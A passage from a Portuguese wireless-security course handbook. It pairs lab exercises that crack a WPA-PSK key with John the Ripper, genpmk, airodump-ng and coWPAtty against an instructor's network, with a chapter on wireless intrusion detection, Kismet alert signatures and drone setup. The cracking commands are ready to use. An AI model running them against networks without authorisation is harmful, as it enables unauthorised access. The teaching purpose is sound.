Isso pode ser feito com a mesma lista de palavras (wordlist); usaremos a ferramenta John
the Ripper (john) para esse fim.

Um dos recursos dessa ferramenta é o parâmetro “--rules”, que testa diversas variações
comuns de cada uma das palavras. Execute o seguinte comando:

# john –-wordlist=/root/Desktop/SEG6/wpa/wordlist-portugues.txt -–
rules --stdout > /rnp-esr/7-wpa/saidas/wordlist-portugues-john.txt

O resultado desse comando deve ser igual ao arquivo


/root/Desktop/SEG6/wpa//wordlist-portugues-john-rules.txt. Confira.

Para compreender melhor o efeito do parâmetro “rules” da ferramenta John the Ripper, con-
sulte o arquivo exemplo-john-rules em /root/Desktop/SEG6/wpa//exemplo-john-rules.txt. Essa
foi a saída para o comando sobre um arquivo que tinha apenas uma palavra, “exemplo”.

2. Repita a operação: repita o comando cowpatty para verificar se o aumento no universo de


palavras foi suficiente para permitir a descoberta da chave dessa rede. Use o arquivo que
geramos, wordlist-portugues-john.txt.

Note que a diferença na quantidade de palavras é bem significativa. O primeiro arquivo tem
1.383 linhas/palavras. Consulte o número de palavras da segunda lista de palavras:

# wc -l /root/Desktop/SEG6/wpa//saidas/wordlist-portugues-john.txt

Esse aumento naturalmente vai causar impacto no tempo de execução da ferramenta


coWPAtty.

Anote o tempo gasto no processo: .

Atividade 7.2 – Descobrindo a chave WPA-PSK por ataque de dicionário de


maneira muito mais rápida
É possível reduzir drasticamente o tempo do ataque por meio do uso de hash de senhas
pré-computadas, levando em consideração o SSID, elemento usado no mecanismo de
autenticação ou associação. Verifique as opções do comando:
Segurança em Redes sem Fio

# genpmk

Para criar esse arquivo de hash:

# genpmk –f arquivo_de_wordlist –s rnpesr –d arquivo_de_wordlist.


hash

Escolha a lista de palavras com a qual tivemos sucesso na etapa anterior (antes ou depois de
John the Ripper). Coloque esse arquivo como parâmetro “-f”.

138
Uma vez gerado o hash file, podemos executar novamente o coWPAtty, agora usando esse
arquivo em vez do dicionário. Note que não usamos mais o parâmetro “-f” (dictionary file), e
sim “-d” (arquivo hash gerado pela ferramenta genpmk).

# cowpatty –d arquivo_de_wordlist.hash –s rnpesr –r /root/Desktop/


SEG6/wpa/wpa-eapol-rnpesr.cap

Observe a execução do coWPAtty e anote o tempo que a ferramenta levou para descobrir
as senhas. Qual foi a principal diferença observada entre os dois métodos de descoberta da
chave? Note que esse arquivo hash só pode ser utilizado para ataques contra o SSID usado
no comando genpmk.

Atividade 7.3 – Realizando um ataque contra a rede do laboratório


O primeiro passo para efetuar um ataque real é capturar o tráfego de um cliente se associando
a um AP configurado com WPA-PSK. Para isso, você aplicará o que aprendeu na sessão
prática que trata de captura. Você deve conhecer, de antemão, o canal da rede a ser atacada
e o SSID da mesma. O primeiro dado é importante na captura, enquanto o último é impor-
tante para o ataque em si.

Você usará a ferramenta Airodump-ng para capturar os pacotes durante a associação de um


cliente ao AP.

Nesse momento existe um AP configurado com WPA-PSK. O instrutor informará canal, SSID
e BSSID (endereço MAC do AP).

# airmon-ng start wlan0

Depois de configurada a interface, já podemos começar a capturar pacotes interessantes, ou


seja, o processo de associação e handshaking TKIP.

Apenas um aluno e o instrutor conhecem a chave da rede WPA Personal/WPA PSK. A estação
de trabalho será associada ou desassociada para gerar o tráfego de que você precisa.

# cd /root/Desktop/SEG6/wpa/saidas/
# airodump-ng --channel X --bssid rnpesr2 -w airodumpng-rnpesr2

Onde X é o canal que o instrutor forneceu, “BSSID” é o BSSID que o instrutor forneceu e
PREFIXO é um campo livre para definição do prefixo do nome de arquivo de saída. Outra
maneira de descobrir esses dados da rede é com as ferramentas Kismet.

Neste ponto, um cliente WPA-PSK iniciará um processo de autenticação ou associação com


o AP. Tão logo acreditemos que já tenha sido capturado o tráfego de um cliente associado, é
preciso interromper a captura com o comando “Control + C”.

A chave da rede é uma das palavras da lista fornecida no início desta prática, wordlist-portugues.txt.
Capítulo 7 - Roteiro de Atividades

A chave também pode ser uma variação deste arquivo, gerada pela ferramenta John the Ripper.

Para iniciar o ataque off-line de força bruta contra o arquivo capturado, use a ferramenta
coWPAtty:

# cowpatty –f /root/Desktop/SEG6/wpa/wordlist-portugues.txt –s
rnpesr2 –r airodumpng-rnpesr2-01.cap

Note que cada vez que executamos o comando airodump-ng, é criado um novo arquivo de
captura sequencial. Exemplo: para um prefixo rnp (comando airodump-ng), os arquivos são
rnp-01.cap, rnp-02.cap e assim por diante.

Observe o tempo que coWPAtty leva para descobrir a chave e anote: .


139
Agora vamos realizar o mesmo ataque usando hashs de chaves pré-computados com a
ferramenta genpmk.

# cd /root/Desktop/SEG6/wpa/saidas

# genpmk –f /root/Desktop/SEG6/wpa/wordlist-portugues.txt –s
rnpesr2 –d wordlist-portugues.hash

Uma vez gerado o arquivo hash, execute novamente o coWPAtty, agora usando esse arquivo
em vez do dicionário:

# cd /root/Desktop/SEG6/wpa/saidas

# cowpatty –d wordlist-portugues.hash –s rnpesr2 –r airodumpng-


rnpesr2-01.cap

Ou:

# cd /root/Desktop/SEG6/wpa/saidas

# cowpatty –d wordlist-portugues.hash –s rnpesr2 –r airodumpng-


rnpesr2-02.cap

Anote o tempo gasto: .


Segurança em Redes sem Fio

140
8
Sistemas de detecção de intrusões
(IDS) em redes WLAN
objetivos

Apresentar conceitos de IDS no contexto de uma WLAN; mostrar os principais métodos


de detecção de ataques em redes sem fio; identificar características importantes de
um IDS – importantes na compra e implantação de um IDS.

conceitos
Funcionalidades de um AP pela instalação de OpenWRT.

Introdução
11 Conceitos de IDS. q
11 Modelos de implantação.

11 Métodos de detecção.

11 Avaliação de soluções de IDS.

11 Características importantes.

11 IDS distribuído com Kismet.

Capítulo 8 - Sistemas de detecção de intrusões (IDS) em redes WLAN


Neste capítulo, serão apresentados conceitos importantes de Intrusion Detection System
(IDS) no contexto de redes sem fio.

Examinaremos conceitos básicos, modelos de implantação, métodos de detecção aplicáveis


a redes 802.11 e características que devem ser consideradas na escolha e na elaboração de
projeto de um IDS.

Ao final, introduziremos o modelo de IDS que o Kismet implementa, com a interessante pos-
sibilidade de distribuição de sensores (Drones), que reportam a um servidor central. Essa
introdução será importante para a atividade prática que se seguirá.

Sistemas de detecção de intrusos (IDS) em redes WLAN


11 Intrusion Detection System. q
11 Extensão da tecnologia IDS para redes sem fio.

11 Monitoração da rede, em busca de sinais de abuso.

11 Sensores distribuídos, repositório central.

141
11 IDS rede sem fio (WIDS) versus IDS rede cabeada. q
22 Camada 2.

22 Canais.

Sistemas de Intrusion Detection System (IDS) em redes sem fio são uma extensão da tecno-
logia já empregada em redes cabeadas. Do ponto de vista de rede, a diferença entre redes
cabeadas e sem fio está na camada física, e é a monitoração nessa camada que nos interessa.

A implantação de um IDS em uma rede cabeada depende do objetivo de monitoração, ou


seja: monitorar a atividade da rede interna, monitorar ataques externos, entre outros.
O perímetro da rede é controlável, englobando a localização física e o controle do acesso
entre redes por firewalls. Redes sem fio têm suas peculiaridades:

11 Não possuem perímetro: pode parecer estranho à primeira vista, mas é possível afirmar
que não há perímetro em redes sem fio, especialmente levando em conta o risco dos rogues;

11 Canais: em redes cabeadas, os sensores normalmente são distribuídos em interfaces


que limitam zonas da rede. Já em redes sem fio, a monitoração normalmente ocorre por
canal. É interessante que se monitore a maior quantidade possível de canais, inclusive os
não utilizados pelas redes da organização;

11 Camada TCP/IP: IDS de uma rede sem fio deve inspecionar quadros de camada 2 – é
isso que lhe confere a capacidade de detectar ataques DoS e outros específicos de redes
802.11. A integração com um IDS de camadas superiores pode ser feita, desde que se
resolva a questão do tráfego cifrado;

11 Tráfego cifrado: nem sempre é possível direcionar o tráfego de camadas 3 e 4 para um


IDS convencional, já que o payload dos quadros 802.11 de dados podem estar cifrados.
Ao final do Capítulo 8, será introduzido o conceito de IDS distribuído com Kismet, ferra-
menta que já conhecemos por sua utilidade em auditorias;

11 WIDS: Wireless IDS.

Termos importantes
Evento de interesse para o analista. q
Falso-positivo:

11 Classificação incorreta de um alerta.

22 Alarme falso.

Falso-negativo:

11 Classificação incorreta de um ataque.

22 Ausência de detecção.

Sistemas de IDS normalmente são baseados em captura de tráfego, busca por assinaturas
conhecidas e alguma forma de alerta para o analista. Existem alguns termos essenciais na
Segurança em Redes sem Fio

avaliação da eficiência de um IDS:

11 Evento de interesse (Event of Interest): evento que pode indicar a presença de um ata-
cante. No contexto de redes sem fio, podemos dar como exemplo a identificação de uma
estação que esteja usando a ferramenta NetStumbler. É importante para se entender os
motivos ou táticas de um atacante;

11 Falso-positivo: classificação incorreta de um alerta, normalmente indicando atividade


maliciosa onde um IDS deve ter pouca incidência de falsos-positivos, uma vez que esse tipo
de alarme falso faz com que analistas reajam e investiguem um ataque que não existe;

142
11 Falso-negativo: o oposto de falso-positivo: há um ataque em andamento, mas o IDS não
é capaz de identificá-lo e, consequentemente, alertar o analista. Um falso-negativo é pior
para a organização do que um falso-positivo e, normalmente, indica uma carência do IDS
– não identificar corretamente tráfego fragmentado em pacotes, por exemplo – ou, o que
é mais frequente, uma base de assinaturas desatualizada.

B as
e de Dados

Alarmes
Detector Contramedidas
Con
figurações

Dados
Ações

Figura 8.1
Arquitetura Sistema
genérica de um IDS.

Modelos de implantação
Cobertura
11 Sensores dedicados. q
22 Salta entre canais sem se preocupar com clientes conectados.

11 Necessidade de hardware dedicado.

22 Opção mais cara.

22 Complexo de gerenciar e implantar.

11 Opção que oferece mais funcionalidades.

11 Detecta ataques avançados.

22 Ajuda na resolução de problemas e monitoração de desempenho.

Capítulo 8 - Sistemas de detecção de intrusões (IDS) em redes WLAN


Dois modelos podem ser adotados na implantação de um IDS: cobertura e integrada. No
modelo “cobertura”, os sensores são dedicados e livres para trocar de canal. Eventualmente
é possível estacionar em um canal que apresente atividade maliciosa. Essa liberdade de
troca de canais é, ao mesmo tempo, a vantagem do modelo “cobertura” e a desvantagem do
modelo “integrado” – pois saltar de canais é bom para monitoração, mas impede que o AP
atenda à associação de clientes.

A desvantagem desse modelo está em dois fatores: custo e complexidade de implantação.


É necessário conduzir um estudo para se avaliar adequadamente a área de cobertura da rede.
Outro fator importante é a necessidade de uma interface dedicada à monitoração, com o uso de
outra interface – normalmente cabeada – para conexão com o servidor centralizado de gerência.

Embora esse modelo seja o de maior custo, teremos condições de implantá-lo na atividade
prática deste Capítulo 8. A relação entre a quantidade de clientes e Access Points, assim
como a disponibilidade de um software de monitoração de qualidade superior e open source
(Kismet) permite que experimentemos um modelo mais sofisticado de monitoração, com mais
funcionalidades. A capacidade de operar em modo “monitor” – em que todo o tráfego de um
dado canal, incluindo os de gerenciamento e controle, é capturado – aliado à possibilidade

143
de saltar entre canais e detectar 22 tipos de ataques conhecidos, confere para Kismet uma
solução com recursos comparáveis aos de soluções comerciais.

Implantação integrada
11 APs existentes para monitoração. q
11 Opção mais barata.

11 Administração mais simples que o modelo “cobertura”.

11 Varredura limitada.

22 Deve permanecer em um único canal para prover serviços.

Outro modelo de implantação disponível é o “integrado”, que usa os próprios Access Points
da infraestrutura para monitoração da rede. É uma solução de baixo custo, mas exige que se
utilize um equipamento que permita essa funcionalidade, porque é necessário que a inter-
face sem fio seja capaz tanto de monitorar quanto de prover serviço de infraestrutura.

Uma implantação de Kismet não é possível nesse modelo, a menos que se tenha um Access
Point com duas interfaces de rede sem fio: uma em modo “monitor” – exigência de Kismet –
e outra para prover associação para clientes.

Diferente do modelo “cobertura”, sensores nesse modelo não são capazes de moni-
torar todos os canais, já que precisam permanecer em um único canal para prover
conectividade para clientes.

Métodos de detecção
11 Análise de assinaturas. q
11 Análise de tendências.

11 Análise de anomalias.

11 Análise individual dos pacotes:

22 Baseada em assinaturas.

22 Rápida e com poucos recursos.

11 Tipo mais comum de detecção.

11 Disponível no Kismet.

11 Detecta somente ataques conhecidos.

22 Necessidade de atualização frequente.

22 Possibilidade de falsos-positivos.

Na análise por assinaturas, cada pacote capturado é analisado contra uma base de assina-
turas de ataques conhecidos. A vantagem dessa técnica é a velocidade de análise, per-
Segurança em Redes sem Fio

mitindo que o sensor seja capaz de detectar ataques mesmo a altas taxas. O único fator
limitante é a capacidade de processamento do dispositivo, que deve ser levada em conside-
ração quando a implementação dos sensores ocorre nos Access Points.

A desvantagem é a incidência de falso-positivos (menor que na abordagem por anomalia) e


a capacidade de detecção de apenas alguns tipos de ataque. É bom lembrar que outro fator
importante que deve ser levado em conta em qualquer sistema que detecta ataques por assina-
tura, seja um IDS ou um antivírus, é a atualização frequente do banco de dados de assinaturas.

144
Kismet provê análise de pacotes por assinaturas para 12 tipos de ataques diferentes, como
veremos mais adiante neste capítulo.

Análise de assinaturas
NetStumbler. q
11 Probes contra um AP descoberto.

11 Mensagem típica incluída no payload.

22 3.2.0 “Flurbe gronk bloopit, bnip, Frundletrune”.

22 3.2.1 “All your 802.11b are belong to us”.

22 3.2.3 “Intentionally blank”.

Um exemplo de ataque detectado por assinatura é a detecção de probes do NetStumbler.


Essa ferramenta envia pacotes únicos, com cadeias de texto que identificam a atividade com

w um nível de falso-positivo quase nulo.


Saiba mais em Outro exemplo de assinatura presente no Kismet é a detecção da atividade de outra ferramenta
“Wellenreiter wireless – Wellenreiter. Entre cada ataque de dicionário por força bruta, na tentativa de descobrir um
penetration tool”:
http://sourceforge.net/ SSID oculto, a ferramenta troca o SSID investigado para “this_is_used_for_wellenreiter” – o que
projects/wellenreiter/ permite que se identifique, com um certo grau de certeza, uma estação suspeita. De maneira
semelhante, a ferramenta AirJack define “airjack” como SSID inicial.

Análise de tendências
11 Pode ser classificada como um subtipo de detecção por anomalia. q
11 Identifica ataques avaliando dados coletados no decorrer do tempo.

11 Mecanismo mais útil.

22 Desvantagem: requer mais memória, mais processamento.

11 Disponível no Kismet.

Outro mecanismo de detecção de ataques disponível é a análise de tendências. Indicadores


que alimentam esse mecanismo podem ser:

Capítulo 8 - Sistemas de detecção de intrusões (IDS) em redes WLAN


11 Probes incomuns;

11 Desassociações em excesso;

11 Detecção de um AP trocando de canal: possível AP falso;

11 Detecção de clientes que apenas efetuam probes na rede, mas nunca se associam: ativi-
dade típica de ferramentas como NetStumbler.

A desvantagem dessa técnica é o consumo significativamente maior de memória e processa-


mento necessários para análise. Esse pode ser um ponto de vulnerabilidade do IDS, já que o
atacante pode tentar esgotar os recursos do sistema.

O Kismet implementa esse tipo de análise e exige mais processamento e memória somente
no servidor – o que diminui consideravelmente o risco de esgotamento de recursos no
Access Point, por conta dessa análise. Trataremos mais adiante de dois tipos de ataques
detectados pelo Kismet por esse tipo de análise.

Análise de anomalias
11 Alarme na ocorrência de eventos afastados significativamente de um comportamento q
145
considerado normal.

22 Base de normalidade – baseline.

11 Requer um período anterior de observação da rede.

11 Identifica eventos anômalos que não condizem com a especificação IEEE 802.11.

11 Pouco implementada.

22 Não disponível no Kismet.

O método por anomalia produz alarmes na ocorrência de eventos que se afastem signifi-
cativamente de um comportamento considerado normal (base de normalidade – baseline),
porém, requer um período anterior de observação da rede para a formação da baseline.

Basicamente, esse tipo de detecção considera suspeito um dado tráfego que não siga a
especificação IEEE 802.11.

A vantagem desse tipo de análise é a possibilidade de detecção de ataques novos, se compa-


rado com a análise contra assinaturas. Contudo, possui a desvantagem de gerar um grande
índice de falsos-positivos.

Avaliando soluções de IDS


Características desejáveis: q
11 Agregação de eventos.

11 Implantação simples.

11 Protocolo de comunicação seguro.

11 Intrusion Prevention System (IPS).

11 Integração com outro IDS.

22 Estender detecção à camada 3.

Alguns recursos devem ser considerados, na avaliação de soluções de IDS para uma rede
sem fio. Alguns deles:

11 Agregação de eventos: possibilidade de concentrar diversos eventos em um único


alerta, facilitando o trabalho do analista.

11 Implantação simples: a configuração dos sensores de maneira centralizada, suporte a


PoE (Power over Ethernet) e detecção de sensores inativos tornam a implantação simples
em ambientes mais complexos.

11 Protocolo de comunicação seguro: protocolos como Syslog, HTTP e SNMP devem ser evi-
tados em favor de opções que não transmitam os dados monitorados em claro pela rede.

11 Intrusion Prevention System: possibilidade de integrar IDS com capacidade de reação


ao promover ataques de DoS contra clientes que se conectem com APs rogue.

11 Integração com outros IDS: possibilidade de integração com um IDS de camada 3


Segurança em Redes sem Fio

e superiores.

No caso de implantações de Kismet, é possível usar a saída da ferramenta e disparar um


ataque DoS contra clientes que tentem se conectar com APs considerados rogue. Os riscos
de evitar o acesso de clientes autênticos da rede e de afetar o funcionamento de redes vizi-
nhas – organizações próximas – deve ser considerado.

Com relação à integração com sistemas IDS tradicionais, é possível direcionar a saída de
Kismet para um named pipe (opção “fifo” da configuração) e enviar o tráfego para uma ferra-
menta como Snort.
146
Essa opção, entretanto, é limitada para tráfego WEP, o único que Kismet é capaz
de decifrar.

Características importantes
Dwell Time e Hop Time: q
11 Tempo em que não há monitoração por troca de canais.

Área de cobertura:

11 Quatro APs para cada sensor.

Armazenamento e análise de tendências:

11 Possibilidade de análise mais elaborada com Excel e outras ferramentas.

Alguns fatores são importantes e devem ser levados em consideração na implantação


de um IDS:

11 Área de cobertura: sensores normalmente usam a rede cabeada para reportar o tráfego
monitorado para o servidor centralizado e, por isso, não precisam transmitir. Assim, não
existem as mesmas restrições de distância que afetam a implantação de APs. Portanto, é
possível implantar sensores numa razão de 4:1, ou seja, 4 APs para cada sensor IDS;

11 Dwell time, Hop Time: o tempo gasto entre os saltos de canais (dwell time) e o tempo
necessário para trocar de canal (hop time) devem ser levados em conta por serem
fatores importantes. É possível que ataques aconteçam enquanto a rede não está sendo
monitorada devido a um desses eventos. Soluções para esse problema são estabilizar em
um canal em que se tenha detectado um ataque ou manter o maior número possível de
sensores em canais estáticos;

11 Armazenamento e análise de tendências: armazenar os eventos de uma forma que seja


recuperável facilmente: um banco de dados, por exemplo, possibilita análises posteriores
com ferramentas de relatórios tais como Excel e Crystal Reports. Outro aspecto impor-
tante, no que diz respeito aos dados armazenados, é a segurança sob os dados armaze-
nados, de forma que um atacante não seja capaz de apagar eventos de um ataque.

Capítulo 8 - Sistemas de detecção de intrusões (IDS) em redes WLAN


IDS distribuído com Kismet
11 Diversas funções: q
22 Sniffer.

22 Detector de redes 802.11 de camada 2.

22 Sistema de detecção de intrusões (WIDS).

11 Modo RFMON:

22 Raw monitoring.

22 Tráfego 802.11a/b/g.

11 Coleta passiva de pacotes.

11 Drones: sensores remotos.

Kismet agrega diversas funções: detector de redes sem fio 802.11 de camada 2, sniffer
(captura de pacotes) e sistema de detecção de intrusões em redes sem fio (WIDS). Esta
última funcionalidade nos interessa em especial.

147
O Kismet tem diversas opções de source, fontes de captura que são fontes de pacotes para
análise. O tipo de fonte determina a maneira de capturar dados da interface: como mudar de
canal, como entrar em modo RFMON. Por meio da interface de captura “kismet_drone”, é pos-
sível identificar o endereço IP e a porta do drone – termo usado para o sensor remoto do Kismet.

Drones Kismet
11 Normalmente servidor, sensor e interface gráfica no mesmo host. q
11 IDS distribuído (escalabilidade).

22 Kismet Server: registros centralizados.

22 Kismet Drones em dispositivos remotos, possibilidade de captura de todos os


canais simultaneamente.

11 Reportam dados coletados por uma interface secundária.

11 Normalmente pela rede cabeada.

11 Possibilidade de salto de canais diferentes.

O uso de drones transforma Kismet em um IDS distribuído. Drones têm todo o suporte a
fontes de capturas do sensor normal, reportando por uma conexão secundária (normalmente,
pela rede cabeada) para um servidor Kismet que armazena e analisa os pacotes coletados.

Diversas configurações de varredura de canais são possíveis: diversos drones que moni-
toram canais distintos, poucos drones que varrem poucos canais ou apenas um drone que
varre todos os canais. É importante lembrar aqui dos conceitos de dwell time e hop time:
quanto menos se saltar entre canais, maior a cobertura do espectro e menor a possibilidade
de perder o tráfego de um atacante.

Devido aos poucos requisitos de processamento e memória, é possível instalar um Drone


Kismet em um AP, que normalmente tem recursos escassos. É bom lembrar, entretanto,
que, ao fazer isso com um AP SOHO (Small Office/Home Office) como os Linksys, o disposi-
tivo perde a funcionalidade de Access Point: com a interface sem fio em modo RFMON não é
possível prover serviço de conexão para clientes.

Na prática deste Capítulo 8, implantaremos uma infraestrutura simples de Drones Kismet


instalados em APs reportando a um servidor central.

Alertas e detecção de intrusões


Vinte e dois tipos de alertas úteis para sensores estáticos. q
11 Assinaturas (12 tipos).

22 Exemplo: versões específicas de NetStumbler.

11 Tendências (10 tipos).

22 Exemplo: desassociações excessivas, probes não usuais.


Segurança em Redes sem Fio

Sem suporte à análise por anomalias.

Possibilidade de integração com IDS de camada 3 e superiores.

11 Integração com Snort por named pipes.

11 Restrito para WEP (decodificação dos pacotes).

Kismet provê detecção de ataques baseada em assinaturas e tendências, com foco na camada
2 (802.11). A integração com a camada 3 e superiores é possível através do uso de Snort com
fonte de captura em um named pipe criado pelo Kismet. A configuração é simples:

148
w
11 Configura-se um Drone Kismet pelo arquivo de configuração kismet_drone.conf;

11 Configura-se o Kismet Server de forma que uma das fontes de captura seja um Drone
Aprenda mais sobre
Named Pipes e o Kismet. O capture source em questão é o kismet_drone;
Kismet. Acesse
11 Acesso aos dados por um cliente Kismet, seja no mesmo host do servidor ou não.
“Introduction to Named
Pipes” em http://www2.
linuxjournal.com/ A integração com Snort é feita por named pipes e deve ser feita no host que hospeda o Kismet
article/2156 e “Kismet Server. Infelizmente, apenas tráfegos WEP ou não cifrados podem ser encaminhados para
reader” em http://www.
o Snort, uma vez que Kismet é capaz de decifrar em tempo real apenas esse tipo de tráfego.
kismetwireless.net/
documentation. Os alertas foram desenvolvidos para sensores estáticos, ou seja, podem emitir alertas sem
shtml#readme importância quando são utilizados sensores móveis em cenários de wardriving, por exemplo.
A descrição das regras nos próximos slides se refere à versão Kismet-2006-04-R1.

Tipos de alerta – assinatura (12 tipos)


11 NETSTUMBLER: Probe requests NetStumbler. q
11 LUCENTTEST: teste de link Lucent.

11 AIRJACKSSID: SSID “airjack”.

11 APSOOF: detecta tentativas de forjar o AP.

11 APSPOOF.

11 DHCPCLIENTID: DHCP DoS.

11 DISCONCODEINVALID: pacotes inválidos de solicitação de desconexão.

11 DEAUTHCODEINVALID: pacotes inválidos de solicitação de desautenticação.

11 LONGSSID: detecta solicitações de conexão SSIDs com nome maior que 32 bytes.

11 MSFBCOMSSID: detecta ataques a vulnerabilidade presente em alguns drivers


broadcom para o SO Windows.

11 MSFDLINKRATE: detecta ataques a vulnerabilidade presente em alguns drivers D-Link


para o SO Windows.

11 MSFNETGEARBEACON: detecta ataques a vulnerabilidade presente em alguns drivers


Netgear para o SO Windows.

11 NULLPROBERESP: detecta ataques a interfaces antigas, vulneráveis a pacotes com o

Capítulo 8 - Sistemas de detecção de intrusões (IDS) em redes WLAN


SSID IE tag de tamanho 0.

11 NETSTUMBLER: em tentativa de obter o SSID de uma rede, o NetStumbler envia pacotes


que podem identificá-lo com uma baixa incidência de falsos-positivos;

11 LUCENTTEST: Lucent/Orinoco/Proxim/Agere fornecem um software de site survey.


Kismet é capaz de identificar quando ele é utilizado;

11 AIRJACKSSID: as ferramentas AirJack definem “airjack” como SSID inicial, possibilitando


detecção pelo Kismet;

11 APSOOF: uma lista de endereços MAC válidos para um determinado SSID pode ser passada
através da opção “apspoof=”. Se for detectado na rede algum Beacon ou tentativa de
conexão ao SSID monitorado, cujo MAC do AP não esteja na lista, um alerta é emitido;

11 DHCPCLIENTID: um cliente que enviar um pacote de DHCP DISCOVER contendo uma tag
de Client-ID, que não bate com o MAC address de origem do pacote, pode estar tentando
gerar uma negação de serviço contra o servidor DHCP;

149
11 DISCONCODEINVALID/DEAUTHCODEINVALID: detecta pacotes de desconexão e/ou desau-
tenticação que não possua códigos corretos para a razão da desconexão/desautenticação;

11 LONGSSID: a especificação 802.11 prevê um máximo de 32 bytes para o nome do SSID.


SSIDs maiores que 32 bytes podem indicar tentativas de exploração de vulnerabilidades
em drivers antigos;

11 MSFBCOMSSID: algumas versões de drivers da Broadcom para o SO Windows não mani-


pulam corretamente campos de SSID maiores que 32 bytes, podendo comprometer o
sistema. Referência: WVE-2006-0071;

11 MSFDLINKRATE: algumas versões de drivers da D-Link para o SO Windows não mani-


pulam corretamente campos de SSID maiores que 32 bytes, podendo comprometer o
sistema. Referência: WVE-2006-0072;

11 MSFNETGEARBEACON: algumas versões de drivers da Netgear para o SO Windows não


manipulam corretamente campos de SSID maiores que 32 bytes, podendo comprometer
o sistema;

11 NULLPROBERESP: pacotes de resposta a uma tentativa de conexão com a tag IE do SSID


de tamanho 0, pode gerar falhas em placas antigas (prism2, orinoco, airport-classic).
Referência: WVE-2005-0019.

Tipos de alerta – tendências (10 tipos)


11 DEAUTHFLOOD: Flood de desautenticação ou desassociação. q
11 CHANCHANGE: AP previamente detectado em um novo canal.

11 PROBENOJOIN: Probes partindo de um cliente que nunca se associa.

11 DISASSOCTRAFFIC: tráfego de uma origem dentro de 10 segundos após desassociação.

11 BSSTIMESTAMP: Timestamps BSS inválidos, possível AP forjado.

11 CRYPTODROP: detecta um AP forjando um SSID com níveis mais baixos de segurança,


visando obter credenciais de conexão dos usuários.

11 BCASTDISCON: detecta pacotes forjados de desassociação ou desconexão que


podem gerar negação de serviço na rede sem fio.

11 DHCPNAMECHANGE/DHCPOSCHANGE: detecta tentativas de clonagem de MAC.

11 DHCPCONFLICT: detecta clientes que receberam um IP do servidor DHCP, porém


trafegam utilizando outro IP.

11 DEAUTHFLOOD: detecção de ataque não persistente de DoS, em que o atacante forja


pacotes de desassociação ou desautenticação;

11 CHANCHANGE: ataque do tipo Man In The Middle (MITM) no qual o atacante tenta dire-
cionar usuários para um AP falso com mesmo SSID de um AP da organização;

11 PROBENOJOIN: detecta atividade possivelmente maliciosa de clientes que fazem probes


por redes, mas que não se associam aos APs que responderam;
Segurança em Redes sem Fio

11 DISASSOCTRAFFIC: um host que se desassocia legitimamente não deveria trocar dados


imediadamente depois. Qualquer cliente que troque dados dentro de 10 segundos após a
desassociação da rede pode ser considerado vítima de um ataque de desassociação;

11 BSSTIMESTAMP: o timestamp BSS não pode ser forjado. Um timestamp BSS diferente é
uma provável tentativa de forjar o BSSID ou SSID de um Access Point;

11 CRYPTODROP: detecta um AP que esteja configurado com um nível mais baixo de segu-
rança (por exemplo, um AP com WEP em uma rede WPA), pode ser utilizado para enganar
um usuário e obter suas credenciais;

150
11 BCASTDISCON: detecta se algum host está enviando pacotes pacotes forjados de desau-
tenticação ou desasociação, o que pode gerar desconexão de todos clientes de uma rede
Wi-Fi (DoS);

11 DHCPNAMECHANGE/DHCPOSCHANGE: o protocolo DHCP permite que o cliente informe


seu hostname no pacote de Discover do DHCP. Esse nome somente deve ser alterado
em situações drásticas (tipo um computador com dual-boot). A detecção dessa troca de
hostname pode indicar uma tentativa de spoof ou de clone de MAC;

11 DHCPCONFLICT: um cliente que recebera um IP do servidor DHCP, porém trafega utili-


zando outro IP, pode indicar uma má configuração do cliente ou uma tentativa de spoof.

Prática de Kismet como IDS Distribuído


Drones Kismet: q
11 Sniffers apenas.

11 Sensores remotos na razão 4:1.

11 Permite monitoramento de todos os canais simultaneamente.

Servidor Kismet.

11 Armazenamento e análise centralizada.

Clientes Kismet.

11 Local ou remoto.

Na atividade prática ao final deste Capítulo, implantaremos um IDS distribuído no modelo


“cobertura”, ou seja, sensores dedicados à monitoração. Usaremos, para isso, todos os ele-
mentos da arquitetura de Kismet:

11 Kismet Server.

11 Kismet Client.

11 Kismet Drone.

O objetivo da atividade é ter sensores abrangendo todos os canais de 802.11b/g, com o obje-
tivo final de detectar ataques e rogues.

Capítulo 8 - Sistemas de detecção de intrusões (IDS) em redes WLAN

151
Segurança em Redes sem Fio

152
Roteiro de Atividades 8
Na prática de reconhecimento da ferramenta Kismet, lidamos com uma infraestrutura com-
posta por Kismet Server e Kismet Client em operação no mesmo host. Existe um terceiro
elemento, Kismet Drone, um software leve, que exerce apenas um papel: encaminhar os
dados coletados para um Kismet Server remoto, como um sensor de detecção.

Dessa forma, podemos criar uma infraestrutura com vários drones e um servidor Kismet rece-
bendo os dados de diversas posições, com placas e canais diferentes, através da rede cabeada.

O Kismet possui três arquivos de configuração:

11 kismet.conf: configuração do Kismet Server.

11 kismet_drone.conf: configuração do Drone.

11 kismet_ui.conf: configuração da Interface Gráfica do Cliente.

Esses arquivos de configuração estão no diretório /usr/local/etc do BackTrack.

Para a criação da infraestrutura, seguiremos os seguintes procedimentos sequenciais para


minimizar a ocorrência de problemas de conexão entre servidor e drones:

11 Configuração das interfaces de rede cabeada com o endereçamento IP do laboratório.


Anote os IPs de cada drone e do servidor;

11 Configuração dos drones (edição do arquivo kismet_drone.conf );

11 Configuração do Kismet Server (edição do arquivo kismet.conf em máquina selecionada


pelo instrutor);

11 Ativação de apenas um drone;

11 Verificação do recebimento de pacotes do drone ativado, na interface de rede do servidor;

11 Ativação do Kismet Server, configurado para receber pacotes apenas do único drone
ativado (editar kismet.conf );

11 Verificação do funcionamento;

11 Desativação do Kismet Server (tecla Q);

11 # ifconfig wlan0 down

11 # ifconfig wlan0 up

11 Ativação dos demais drones;

11 Verificação do recebimento de pacotes dos drones ativados, na interface de rede do servidor;

11 Ativação do Kismet Server, configurado para receber pacotes dos demais drones ativados
Capítulo 8 - Roteiro de Atividades

(editar kismet.conf ) que estão enviando pacotes;

11 Verificação do funcionamento.

153
Atividade 8.1 – Configurando o Kismet Drone
A configuração do drone é feita de maneira bem simples: bastam algumas alterações no
arquivo kismet_drone.conf, em /usr/local/etc/ do seu BackTrack. Lembre-se de salvar o arquivo
de configuração.

1. Altere para o endereço IP do Kismet Server ou pela máscara da rede, por exemplo:

allowedhosts=192.168.1.1

2. Altere o bindadress para o IP do cliente drone. Verifique o IP usando o comando ifconfig.

bindaddress=192.168.1.10

3. Defina a interface de captura do drone com canal inicial “1”:

source=rt73,wlan0,drone1,1

4. Configure a interface para não saltar entre canais:

channelhop=false

Atividade 8.2 – Configurando o Kismet Server


Como já mencionado, o Kismet Server pode receber dados não somente das interfaces de
rede locais (que pode ser mais de uma), mas também de Kismet Drones remotos.

